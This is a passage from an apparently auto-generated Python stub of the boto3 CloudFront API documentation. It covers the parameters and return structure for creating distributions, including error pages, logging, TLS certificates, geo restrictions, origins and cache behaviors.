specifies the value of the ID element for the origin that contains your custom error pages. If you specify a value for ResponsePagePath , you must also specify a value for ResponseCode . If you don't want to specify a value, include an empty element, ResponsePagePath , in the XML document. We recommend that you store custom error pages in an Amazon S3 bucket. If you store custom error pages on an HTTP server and the server starts to return 5xx errors, CloudFront can't get the files that you want to return to viewers because the origin server is unavailable. ResponseCode (string) --The HTTP status code that you want CloudFront to return to the viewer along with the custom error page. There are a variety of reasons that you might want CloudFront to return a status code different from the status code that your origin returned to CloudFront, for example: Some Internet devices (some firewalls and corporate proxies, for example) intercept HTTP 4xx and 5xx and prevent the response from being returned to the viewer. If you substitute 200 , the response typically won't be intercepted. If you don't care about distinguishing among different client errors or server errors, you can specify 400 or 500 as the ResponseCode for all 4xx or 5xx errors. You might want to return a 200 status code (OK) and static website so your customers don't know that your website is down. If you specify a value for ResponseCode , you must also specify a value for ResponsePagePath . If you don't want to specify a value, include an empty element, ResponseCode , in the XML document. ErrorCachingMinTTL (integer) --The minimum amount of time, in seconds, that you want CloudFront to cache the HTTP status code specified in ErrorCode . When this time period has elapsed, CloudFront queries your origin to see whether the problem that caused the error has been resolved and the requested object is now available. If you don't want to specify a value, include an empty element, ErrorCachingMinTTL , in the XML document. For more information, see Customizing Error Responses in the Amazon CloudFront Developer Guide . Comment (string) -- [REQUIRED]Any comments you want to include about the distribution. If you don't want to specify a comment, include an empty Comment element. To delete an existing comment, update the distribution configuration and include an empty Comment element. To add or change a comment, update the distribution configuration and specify the new comment. Logging (dict) --A complex type that controls whether access logs are written for the distribution. For more information about logging, see Access Logs in the Amazon CloudFront Developer Guide . Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a distribution or if you want to disable logging for an existing distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket , prefix , and IncludeCookies , the values are automatically deleted. IncludeCookies (boolean) -- [REQUIRED]Specifies whether you want CloudFront to include cookies in access logs, specify true for IncludeCookies . If you choose to include cookies in logs, CloudFront logs all cookies regardless of how you configure the cache behaviors for this distribution. If you do not want to include cookies when you create a distribution or if you want to disable include cookies for an existing distribution, specify false for IncludeCookies . Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com . Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element. PriceClass (string) --The price class that corresponds with the maximum price that you want to pay for CloudFront service. If you specify PriceClass_All , CloudFront responds to requests for your objects from all CloudFront edge locations. If you specify a price class other than PriceClass_All , CloudFront serves your objects from the CloudFront edge location that has the lowest latency among the edge locations in your price class. Viewers who are in or near regions that are excluded from your specified price class may encounter slower performance. For more information about price classes, see Choosing the Price Class for a CloudFront Distribution in the Amazon CloudFront Developer Guide . For information about CloudFront pricing, including how price classes map to CloudFront regions, see Amazon CloudFront Pricing . Enabled (boolean) -- [REQUIRED]From this field, you can enable or disable the selected distribution. If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted. ViewerCertificate (dict) --A complex type that specifies the following: Which SSL/TLS certificate to use when viewers request objects using HTTPS Whether you want CloudFront to use dedicated IP addresses or SNI when you're using alternate domain names in your object names The minimum protocol version that you want CloudFront to use when communicating with viewers For more information, see Using an HTTPS Connection to Access Your Objects in the Amazon Amazon CloudFront Developer Guide . CloudFrontDefaultCertificate (boolean) -- IAMCertificateId (string) -- ACMCertificateArn (string) -- SSLSupportMethod (string) --If you specify a value for ACMCertificateArn or for IAMCertificateId , you must also specify how you want CloudFront to serve HTTPS requests: using a method that works for all clients or one that works for most clients: vip : CloudFront uses dedicated IP addresses for your content and can respond to HTTPS requests from any viewer. However, you will incur additional monthly charges. sni-only : CloudFront can respond to HTTPS requests from viewers that support Server Name Indication (SNI). All modern browsers support SNI, but some browsers still in use don't support SNI. If some of your users' browsers don't support SNI, we recommend that you do one of the following: Use the vip option (dedicated IP addresses) instead of sni-only . Use the CloudFront SSL/TLS certificate instead of a custom certificate. This requires that you use the CloudFront domain name of your distribution in the URLs for your objects, for example, https://d111111abcdef8.cloudfront.net/logo.png . If you can control which browser your users use, upgrade the browser to one that supports SNI. Use HTTP instead of HTTPS. Do not specify a value for SSLSupportMethod if you specified CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate . For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide . MinimumProtocolVersion (string) --Specify the minimum version of the SSL/TLS protocol that you want CloudFront to use for HTTPS connections between viewers and CloudFront: SSLv3 or TLSv1 . CloudFront serves your objects only to viewers that support SSL/TLS version that you specify and later versions. The TLSv1 protocol is more secure, so we recommend that you specify SSLv3 only if your users are using browsers or devices that don't support TLSv1 . Note the following: If you specify CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate, the minimum SSL protocol version is TLSv1 and can't be changed. If you're using a custom certificate (if you specify a value for ACMCertificateArn or for IAMCertificateId ) and if you're using SNI (if you specify sni-only for SSLSupportMethod ), you must specify TLSv1 for MinimumProtocolVersion . Certificate (string) --Include one of these values to specify the following: Whether you want viewers to use HTTP or HTTPS to request your objects. If you want viewers to use HTTPS, whether you're using an alternate domain name such as example.com or the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net . If you're using an alternate domain name, whether AWS Certificate Manager (ACM) provided the certificate, or you purchased a certificate from a third-party certificate authority and imported it into ACM or uploaded it to the IAM certificate store. You must specify one (and only one) of the three values. Do not specify false for CloudFrontDefaultCertificate . If you want viewers to use HTTP to request your objects : Specify the following value:CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate In addition, specify allow-all for ViewerProtocolPolicy for all of your cache behaviors. If you want viewers to use HTTPS to request your objects : Choose the type of certificate that you want to use based on whether you're using an alternate domain name for your objects or the CloudFront domain name: If you're using an alternate domain name, such as example.com : Specify one of the following values, depending on whether ACM provided your certificate or you purchased your certificate from third-party certificate authority: ACMCertificateArnARN for ACM SSL/TLS certificateACMCertificateArn where ARN for ACM SSL/TLS certificate is the ARN for the ACM SSL/TLS certificate that you want to use for this distribution. IAMCertificateIdIAM certificate IDIAMCertificateId where IAM certificate ID is the ID that IAM returned when you added the certificate to the IAM certificate store. If you specify ACMCertificateArn or IAMCertificateId , you must also specify a value for SSLSupportMethod . If you choose to use an ACM certificate or a certificate in the IAM certificate store, we recommend that you use only an alternate domain name in your object URLs (https://example.com/logo.jpg ). If you use the domain name that is associated with your CloudFront distribution (https://d111111abcdef8.cloudfront.net/logo.jpg ) and the viewer supports SNI , then CloudFront behaves normally. However, if the browser does not support SNI, the user's experience depends on the value that you choose for SSLSupportMethod : vip : The viewer displays a warning because there is a mismatch between the CloudFront domain name and the domain name in your SSL/TLS certificate. sni-only : CloudFront drops the connection with the browser without returning the object. **If you're using the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net ** : Specify the following value: `` CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate`` If you want viewers to use HTTPS, you must also specify one of the following values in your cache behaviors: ViewerProtocolPolicyhttps-onlyViewerProtocolPolicy ViewerProtocolPolicyredirect-to-httpsViewerProtocolPolicy You can also optionally require that CloudFront use HTTPS to communicate with your origin by specifying one of the following values for the applicable origins: OriginProtocolPolicyhttps-onlyOriginProtocolPolicy OriginProtocolPolicymatch-viewerOriginProtocolPolicy For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide . CertificateSource (string) -- Note This field is deprecated. You can use one of the following: [ACMCertificateArn , IAMCertificateId , or CloudFrontDefaultCertificate] . Restrictions (dict) --A complex type that identifies ways in which you want to restrict distribution of your content. GeoRestriction (dict) -- [REQUIRED]A complex type that controls the countries in which your content is distributed. CloudFront determines the location of your users using MaxMind GeoIP databases. RestrictionType (string) -- [REQUIRED]The method that you want to use to restrict distribution of your content by country: none : No geo restriction is enabled, meaning access to content is not restricted by client geo location. blacklist : The Location elements specify the countries in which you do not want CloudFront to distribute your content. whitelist : The Location elements specify the countries in which you want CloudFront to distribute your content. Quantity (integer) -- [REQUIRED]When geo restriction is enabled , this is the number of countries in your whitelist or blacklist . Otherwise, when it is not enabled, Quantity is 0 , and you can omit Items . Items (list) --A complex type that contains a Location element for each country in which you want CloudFront either to distribute your content (whitelist ) or not distribute your content (blacklist ). The Location element is a two-letter, uppercase country code for a country that you want to include in your blacklist or whitelist . Include one Location element for each country. CloudFront and MaxMind both use ISO 3166 country codes. For the current list of countries and the corresponding codes, see ISO 3166-1-alpha-2 code on the International Organization for Standardization website. You can also refer to the country list in the CloudFront console, which includes both country names and codes. (string) -- WebACLId (string) --A unique identifier that specifies the AWS WAF web ACL, if any, to associate with this distribution. AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content. Based on conditions that you specify, such as the IP addresses that requests originate from or the values of query strings, CloudFront responds to requests either with the requested content or with an HTTP 403 status code (Forbidden). You can also configure CloudFront to return a custom error page when a request is blocked. For more information about AWS WAF, see the AWS WAF Developer Guide . HttpVersion (string) --(Optional) Specify the maximum HTTP version that you want viewers to use to communicate with CloudFront. The default value for new web distributions is http2. Viewers that don't support HTTP/2 automatically use an earlier HTTP version. For viewers and CloudFront to use HTTP/2, viewers must support TLS 1.2 or later, and must support Server Name Identification (SNI). In general, configuring CloudFront to communicate with viewers using HTTP/2 reduces latency. You can improve performance by optimizing for HTTP/2. For more information, do an Internet search for 'http/2 optimization.' IsIPV6Enabled (boolean) --If you want CloudFront to respond to IPv6 DNS requests with an IPv6 address for your distribution, specify true . If you specify false , CloudFront responds to IPv6 DNS requests with the DNS response code NOERROR and with no IP addresses. This allows viewers to submit a second request, for an IPv4 address for your distribution. In general, you should enable IPv6 if you have users on IPv6 networks who want to access your content. However, if you're using signed URLs or signed cookies to restrict access to your content, and if you're using a custom policy that includes the IpAddress parameter to restrict the IP addresses that can access your content, do not enable IPv6. If you want to restrict access to some content by IP address and not restrict access to other content (or restrict access but not by IP address), you can create two distributions. For more information, see Creating a Signed URL Using a Custom Policy in the Amazon CloudFront Developer Guide . If you're using an Amazon Route 53 alias resource record set to route traffic to your CloudFront distribution, you need to create a second alias resource record set when both of the following are true: You enable IPv6 for the distribution You're using alternate domain names in the URLs for your objects For more information, see Routing Traffic to an Amazon CloudFront Web Distribution by Using Your Domain Name in the Amazon Route 53 Developer Guide . If you created a CNAME resource record set, either with Amazon Route 53 or with another DNS service, you don't need to make any changes. A CNAME record will route traffic to your distribution regardless of the IP address format of the viewer request. :rtype: dict :return: { 'Distribution': { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'InProgressInvalidationBatches': 123, 'DomainName': 'string', 'ActiveTrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ { 'AwsAccountNumber': 'string', 'KeyPairIds': { 'Quantity': 123, 'Items': [ 'string', ] } }, ] }, 'DistributionConfig': { 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False } }, 'Location': 'string', 'ETag': 'string' } :returns: If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName . The bucket name must be between 3 and 63 characters long (inclusive). The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes. The bucket name must not contain adjacent periods. """ pass def create_distribution_with_tags(DistributionConfigWithTags=None): """ Create a new distribution with tags. See also: AWS API Documentation :example: response = client.create_distribution_with_tags( DistributionConfigWithTags={ 'DistributionConfig': { 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False }, 'Tags': { 'Items': [ { 'Key': 'string', 'Value': 'string' }, ] } } ) :type DistributionConfigWithTags: dict :param DistributionConfigWithTags: [REQUIRED] The distribution's configuration information. DistributionConfig (dict) -- [REQUIRED]A distribution configuration. CallerReference (string) -- [REQUIRED]A unique value (for example, a date-time stamp) that ensures that the request can't be replayed. If the value of CallerReference is new (regardless of the content of the DistributionConfig object), CloudFront creates a new distribution. If CallerReference is a value you already sent in a previous request to create a distribution, and if the content of the DistributionConfig is identical to the original request (ignoring white space), CloudFront returns the same the response that it returned to the original request. If CallerReference is a value you already sent in a previous request to create a distribution but the content of the DistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error. Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this distribution. Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution. Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution. (string) -- DefaultRootObject (string) --The object that you want CloudFront to request from your origin (for example, index.html ) when a viewer requests the root URL for your distribution (http://www.example.com ) instead of an object in your distribution (http://www.example.com/product-description.html ). Specifying a default root object avoids exposing the contents of your distribution. Specify only the object name, for example, index.html . Do not add a / before the object name. If you don't want to specify a default root object when you create a distribution, include an empty DefaultRootObject element. To delete the default root object from an existing distribution, update the distribution configuration and include an empty DefaultRootObject element. To replace the default root object, update the distribution configuration and specify the new object. For more information about the default root object, see Creating a Default Root Object in the Amazon CloudFront Developer Guide . Origins (dict) -- [REQUIRED]A complex type that contains information about origins for this distribution. Quantity (integer) -- [REQUIRED]The number of origins for this distribution. Items (list) --A complex type that contains origins for this distribution. (dict) --A complex type that describes the Amazon S3 bucket or the HTTP server (for example, a web server) from which CloudFront gets your files. You must create at least one origin. For the current limit on the number of origins that you can create for a distribution, see Amazon CloudFront Limits in the AWS General Reference . Id (string) -- [REQUIRED]A unique identifier for the origin. The value of Id must be unique within the distribution. When you specify the value of TargetOriginId for the default cache behavior or for another cache behavior, you indicate the origin to which you want the cache behavior to route requests by specifying the value of the Id element for that origin. When a request matches the path pattern for that cache behavior, CloudFront routes the request to the specified origin. For more information, see Cache Behavior Settings in the Amazon CloudFront Developer Guide . DomainName (string) -- [REQUIRED] Amazon S3 origins : The DNS name of the Amazon S3 bucket from which you want CloudFront to get objects for this origin, for example, myawsbucket.s3.amazonaws.com . Constraints for Amazon S3 origins: If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName . The bucket name must be between 3 and 63 characters long (inclusive). The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes. The bucket name must not contain adjacent periods. Custom Origins : The DNS domain name for the HTTP server from which you want CloudFront to get objects for this origin, for example, www.example.com . Constraints for custom origins: DomainName must be a valid DNS name that contains only a-z, A-Z, 0-9, dot (.), hyphen (-), or underscore (_) characters. The name cannot exceed 128 characters. OriginPath (string) --An optional element that causes CloudFront to request your content from a directory in your Amazon S3 bucket or your custom origin. When you include the OriginPath element, specify the directory name, beginning with a / . CloudFront appends the directory name to the value of DomainName , for example, example.com/production . Do not include a / at the end of the directory name. For example, suppose you've specified the following values for your distribution: DomainName : An Amazon S3 bucket named myawsbucket . OriginPath : /production CNAME : example.com When a user enters example.com/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/index.html . When a user enters example.com/acme/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/acme/index.html . CustomHeaders (dict) --A complex type that contains names and values for the custom headers that you want. Quantity (integer) -- [REQUIRED]The number of custom headers, if any, for this distribution. Items (list) -- Optional : A list that contains one OriginCustomHeader element for each custom header that you want CloudFront to forward to the origin. If Quantity is 0 , omit Items . (dict) --A complex type that contains HeaderName and HeaderValue elements, if any, for this distribution. HeaderName (string) -- [REQUIRED]The name of a header that you want CloudFront to forward to your origin. For more information, see Forwarding Custom Headers to Your Origin (Web Distributions Only) in the Amazon Amazon CloudFront Developer Guide . HeaderValue (string) -- [REQUIRED]The value for the header that you specified in the HeaderName field. S3OriginConfig (dict) --A complex type that contains information about the Amazon S3 origin. If the origin is a custom origin, use the CustomOriginConfig element instead. OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the origin. Use an origin access identity to configure the origin so that viewers can only access objects in an Amazon S3 bucket through CloudFront. The format of the value is: origin-access-identity/CloudFront/ID-of-origin-access-identity where `` ID-of-origin-access-identity `` is the value that CloudFront returned in the ID element when you created the origin access identity. If you want viewers to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element. To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element. To replace the origin access identity, update the distribution configuration and specify the new origin access identity. For more information about the origin access identity, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . CustomOriginConfig (dict) --A complex type that contains information about a custom origin. If the origin is an Amazon S3 bucket, use the S3OriginConfig element instead. HTTPPort (integer) -- [REQUIRED]The HTTP port the custom origin listens on. HTTPSPort (integer) -- [REQUIRED]The HTTPS port the custom origin listens on. OriginProtocolPolicy (string) -- [REQUIRED]The origin protocol policy to apply to your origin. OriginSslProtocols (dict) --The SSL/TLS protocols that you want CloudFront to use when communicating with your origin over HTTPS. Quantity (integer) -- [REQUIRED]The number of SSL/TLS protocols that you want to allow CloudFront to use when establishing an HTTPS connection with this origin. Items (list) -- [REQUIRED]A list that contains allowed SSL/TLS protocols for this distribution. (string) -- OriginReadTimeout (integer) --You can create a custom origin read timeout. All timeout units are in seconds. The default origin read timeout is 30 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 4 seconds; the maximum is 60 seconds. If you need to increase the maximum time limit, contact the AWS Support Center . OriginKeepaliveTimeout (integer) --You can create a custom keep-alive timeout. All timeout units are in seconds. The default keep-alive timeout is 5 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 1 second; the maximum is 60 seconds. If you need to increase the maximum time limit, contact the AWS Support Center . DefaultCacheBehavior (dict) -- [REQUIRED]A complex type that describes the default cache behavior if you do not specify a CacheBehavior element or if files don't match any of the values of PathPattern in CacheBehavior elements. You must create exactly one default cache behavior. TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior. ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies. QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any: If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin. If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify. If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters. For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide . Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide . Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type. Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element. WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies. If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically. For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference . Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior. Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior. (string) -- Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior. Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following: Forward all headers to your origin : Specify 1 for Quantity and * for Name . Warning If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin. Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify. Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers. Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items . (string) -- QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior. Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior. Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items . (string) -- TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content. If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide . If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items . To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the 